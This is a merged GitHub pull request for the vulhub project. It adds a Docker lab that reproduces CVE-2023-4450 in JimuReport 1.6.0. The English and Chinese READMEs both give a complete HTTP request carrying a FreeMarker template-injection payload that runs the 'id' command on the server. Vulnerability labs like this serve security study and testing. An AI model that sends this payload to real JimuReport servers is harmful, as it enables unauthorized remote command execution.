Merge pull request vulhub#516 from vulhub/jimureport-cve-2023-4450

Added JimiReport 1.6.0 CVE-2023-4450
startsw1th · May 5, 2024 · 3b6e1c6 · 3b6e1c6
2 parents cbeb60f + 50dad93
commit 3b6e1c6
Show file tree

Hide file tree

Showing 6 changed files with 152 additions and 0 deletions.
diff --git a/base/jimureport/1.6.0/Dockerfile b/base/jimureport/1.6.0/Dockerfile
@@ -0,0 +1,32 @@
+FROM maven:3-eclipse-temurin-17 AS builder
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+RUN set -ex \
+    && wget -qO- https://github.com/jeecgboot/JimuReport/archive/refs/tags/v1.6.0.tar.gz | tar xz --strip-components=1 -C /usr/src \
+    && cd /usr/src/jimureport-example \
+    && sed -i 's|MYSQL-HOST|MYSQL_HOST|i' src/main/resources/application.yml \
+    && sed -i 's|MYSQL-PORT|MYSQL_PORT|i' src/main/resources/application.yml \
+    && sed -i 's|MYSQL-DB|MYSQL_DB|i' src/main/resources/application.yml \
+    && sed -i 's|username: root|username: \${MYSQL_USERNAME:root}|i' src/main/resources/application.yml \
+    && sed -i 's|password: root|password: \${MYSQL_PASSWORD:root}|i' src/main/resources/application.yml \
+    && sed -i 's|http://maven.aliyun.com|https://maven.aliyun.com|i' pom.xml \
+    && sed -i 's|http://maven.jeecg.org|https://maven.jeecg.org|i' pom.xml \
+    && mvn package -DskipTests
+
+FROM eclipse-temurin:17-jdk-jammy
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+RUN set -ex \
+    && mkdir /opt/jimureport /opt/upload \
+    && apt-get update \
+    && apt-get install -y --no-install-recommends mysql-client
+
+COPY --from=builder /usr/src/jimureport-example/target/jimureport-example-1.6.jar /opt/jimureport/jimureport-example-1.6.jar
+COPY --from=builder /usr/src/db/jimureport.mysql5.7.create.sql /opt/jimureport/jimureport.mysql5.7.create.sql
+COPY docker-entrypoint.sh /docker-entrypoint.sh
+
+WORKDIR /opt/jimureport
+ENTRYPOINT [ "bash", "/docker-entrypoint.sh" ]
+CMD [ "java", "-jar", "/opt/jimureport/jimureport-example-1.6.jar" ]
diff --git a/base/jimureport/1.6.0/docker-entrypoint.sh b/base/jimureport/1.6.0/docker-entrypoint.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+
+set -ex
+
+echo "Waiting for database to start..."
+while ! mysqladmin ping -h "${MYSQL_HOST:-127.0.0.1}" -P "${MYSQL_PORT:-3306}" -u"${MYSQL_USERNAME:-root}" -p"${MYSQL_PASSWORD:-root}" --silent; do
+    sleep 1
+done
+
+if ! mysql -h "${MYSQL_HOST:-127.0.0.1}" -P "${MYSQL_PORT:-3306}" -u"${MYSQL_USERNAME:-root}" -p"${MYSQL_PASSWORD:-root}" -D "${MYSQL_DB:-jimureport}" -e 'describe jimu_dict;' > /dev/null 2>&1; then
+    echo "database does not exist, initializing..."
+    mysql -h "${MYSQL_HOST:-127.0.0.1}" -P "${MYSQL_PORT:-3306}" -u"${MYSQL_USERNAME:-root}" -p"${MYSQL_PASSWORD:-root}" -D "${MYSQL_DB:-jimureport}" < /opt/jimureport/jimureport.mysql5.7.create.sql
+else
+    echo "database have already initialized, skip..."
+fi
+
+exec "$@"
diff --git a/jimureport/CVE-2023-4450/1.png b/jimureport/CVE-2023-4450/1.png
diff --git a/jimureport/CVE-2023-4450/README.md b/jimureport/CVE-2023-4450/README.md
@@ -0,0 +1,43 @@
+# JimuReport FreeMarker Server Side Template Injection RCE (CVE-2023-4450)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+JimuReport is a open source visualization report platform. In the version prior to 1.6.0, there is a FreeMarker server side template injection (SSTI) issue that is able to execute arbitrary commands.
+
+References:
+
+- <https://github.com/advisories/GHSA-j8h5-8rrr-m6j9>
+- <https://whoopsunix.com/docs/java/named%20module/>
+
+## Vulnerable Environment
+
+Execute following command to start a JimuReport 1.6.0 server:
+
+```
+docker compose up -d
+```
+
+Wait a few seconds and you can see the index page of JimuReport on `http://your-ip:8085`.
+
+## Exploit
+
+Send the following request to execute the FreeMarker template `<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}`:
+
+```
+POST /jmreport/queryFieldBySql HTTP/1.1
+Host: localhost:8085
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/json
+Content-Length: 100
+
+{"sql":"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}'" }
+```
+
+The `id` command has been executed successfully:
+
+![](1.png)
diff --git a/jimureport/CVE-2023-4450/README.zh-cn.md b/jimureport/CVE-2023-4450/README.zh-cn.md
@@ -0,0 +1,41 @@
+# JimuReport FreeMarker 服务端模板注入命令执行（CVE-2023-4450）
+
+积木报表（JimuReport）是一个开源的数据可视化报表平台。在其1.6.0版本及以前，存在一个FreeMarker服务端模板注入（SSTI）漏洞，攻击者利用该漏洞可在服务器中执行任意命令。
+
+参考链接：
+
+- <https://github.com/advisories/GHSA-j8h5-8rrr-m6j9>
+- <https://whoopsunix.com/docs/java/named%20module/>
+
+## 漏洞环境
+
+执行如下命令启动一个JimuReport 1.6.0演示服务器：
+
+```
+docker compose up -d
+```
+
+等待一段时间后，访问`http://your-ip:8085`即可看到报表首页。
+
+## 漏洞复现
+
+发送如下请求，即可在服务端注入FreeMarker模板`<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}`：
+
+```
+POST /jmreport/queryFieldBySql HTTP/1.1
+Host: localhost:8085
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/json
+Content-Length: 100
+
+{"sql":"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}'" }
+```
+
+可见，`id`命令已经成功被执行：
+
+![](1.png)
diff --git a/jimureport/CVE-2023-4450/docker-compose.yml b/jimureport/CVE-2023-4450/docker-compose.yml
@@ -0,0 +1,19 @@
+version: '2'
+services:
+ web:
+   image: vulhub/jimureport:1.6.0
+   depends_on:
+    - db
+   environment: 
+    - MYSQL_HOST=db
+    - MYSQL_PORT=3306
+    - MYSQL_DB=jimureport
+    - MYSQL_USER=root
+    - MYSQL_PASSWORD=root
+   ports:
+    - "8085:8085"
+ db:
+   image: mysql:5.7
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=jimureport